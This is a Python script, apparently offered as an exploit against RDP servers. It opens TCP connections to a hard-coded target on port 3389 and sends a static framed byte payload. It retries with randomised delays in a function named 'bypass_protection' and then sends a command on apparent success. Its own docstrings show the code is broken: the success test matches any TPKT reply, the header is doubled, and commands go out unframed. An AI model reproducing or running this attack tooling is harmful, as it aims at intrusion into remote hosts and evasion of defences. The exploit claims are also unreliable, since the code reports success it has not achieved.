import socket
import struct
import time
import random
def create_rdp_connection(ip, port):
    """Open a plain TCP connection to ``ip``:``port`` and return the socket.

    Returns ``None`` (after printing the error) when the socket cannot be
    created or the connect fails.  Every exception type is swallowed by the
    broad ``except``, so callers only ever see a socket or ``None``.  No
    timeout is configured, so ``connect`` blocks for the OS default, and the
    socket object created before a failed ``connect`` is not closed here.
    """
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect((ip, port))
    except Exception as err:
        print(f"Error creating connection: {err}")
        return None
    return conn
def send_exploit(sock, payload):
    """Frame ``payload`` with TPKT and X.224 headers, send it, return the reply.

    The TPKT length field is ``len(payload) + 4`` and the X.224 length field
    ``len(payload) + 2``; both are derived from the payload size plus a fixed
    constant, not from the size of the assembled frame.  ``sock.send`` is
    used rather than ``sendall``, so the number of bytes actually written is
    ignored, and at most 1024 bytes of the reply are read and printed.  A
    ``socket.error`` or any other exception is printed and converted into a
    ``None`` return.
    """
    try:
        # 4-byte TPKT header: version 3, reserved 0, big-endian length.
        tpkt = struct.pack("!BBH", 3, 0, len(payload) + 4)
        # 5-byte X.224 header: fixed prefix followed by a big-endian length.
        x224 = b'\x02\xf0\x80' + struct.pack("!H", len(payload) + 2)
        frame = b"".join((tpkt, x224, payload))
        sock.send(frame)
        reply = sock.recv(1024)
        print(f"Received: {reply}")
        return reply
    except socket.error as err:
        print(f"Socket error sending exploit: {err}")
        return None
    except Exception as err:
        print(f"Error sending exploit: {err}")
        return None
def exploit_successful(response):
    """Return ``True`` if ``response`` is non-empty and contains bytes 0x03 0x00.

    This is a weak heuristic: 0x03 0x00 are the same two bytes this script's
    own TPKT header starts with (version 3, reserved 0), so any TPKT-framed
    reply, including a protocol error, satisfies the check.  A falsy
    ``response`` (``None`` or ``b""``) yields ``False``.
    """
    return bool(response) and b"\x03\x00" in response
def execute_command(sock, command):
    """Send ``command`` UTF-8 encoded over ``sock`` and print up to 1024 reply bytes.

    The text is written raw, with no TPKT/X.224 framing and no length prefix,
    via ``sock.send`` (partial writes are not retried).  Always returns
    ``None``; a ``socket.error`` or any other exception is printed rather
    than propagated.
    """
    try:
        sock.send(command.encode('utf-8'))
        print(f"Command response: {sock.recv(1024)}")
    except socket.error as err:
        print(f"Socket error executing command: {err}")
    except Exception as err:
        print(f"Error executing command: {err}")
def reset_connection(sock, ip, port):
    """Close ``sock``, pause for a random 1–3 s, and return a fresh connection.

    Failures from ``close`` are ignored entirely.  The return value is
    whatever ``create_rdp_connection`` produces (a socket or ``None``).
    """
    try:
        sock.close()
    except BaseException:
        # Same coverage as the original bare ``except``: nothing from close()
        # is allowed to escape.
        pass
    time.sleep(random.uniform(1, 3))
    return create_rdp_connection(ip, port)
def bypass_protection(ip, port, payload, retries=5, delay_range=(1, 5)):
    """Retry ``send_exploit`` up to ``retries`` times with randomised delays.

    Returns ``(sock, response)`` on the first attempt whose reply passes
    ``exploit_successful``, otherwise ``(None, None)``.  Despite the name, the
    only variation between attempts is timing: ``random.uniform(0.1, 1.0)``
    before sending and ``random.uniform(*delay_range)`` between attempts;
    each attempt opens a new TCP connection.  A failed connect ``continue``s
    with no delay at all, and the socket returned by ``reset_connection`` is
    overwritten by the next ``create_rdp_connection`` call without being
    closed.
    """
    for idx in range(1, retries + 1):
        print(f"Attempt {idx}/{retries}")
        sock = create_rdp_connection(ip, port)
        if not sock:
            continue
        # Jitter before the send.
        time.sleep(random.uniform(0.1, 1.0))
        response = send_exploit(sock, payload)
        if response and exploit_successful(response):
            return sock, response
        print("Exploit attempt failed. Retrying...")
        sock = reset_connection(sock, ip, port)
        # Jitter between attempts.
        time.sleep(random.uniform(*delay_range))
    return None, None
def main():
    """Script entry point: run ``bypass_protection`` against the hard-coded target.

    ``target_ip``, ``target_port`` (3389, RDP's default) and ``payload`` are
    constants in the body; ``payload`` is a static byte string that is sent
    as-is, and it already begins with 0x03 0x00, the same two bytes
    ``send_exploit`` prepends as a TPKT header.  On success one command
    string is sent with ``execute_command`` and the socket is closed;
    otherwise a failure message is printed.  Nothing here interprets the
    server's reply beyond ``exploit_successful``.
    """
    target_ip = "192.168.1.100"  # Replace this with the target IP address
    target_port = 3389  # Default port for RDP
    payload = b'\x03\x00\x01\x0b\x06\xd0\x00\x00\x12\x34\x00\x02\x01\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    sock, response = bypass_protection(target_ip, target_port, payload)
    if not (sock and response):
        print("Exploit failed after multiple attempts.")
        return
    print("Exploit successful!")
    execute_command(sock, "echo Hello from exploit")
    sock.close()
# Entry-point guard: main() only runs when the file is executed directly,
# never on import.
if __name__ == "__main__":
    main()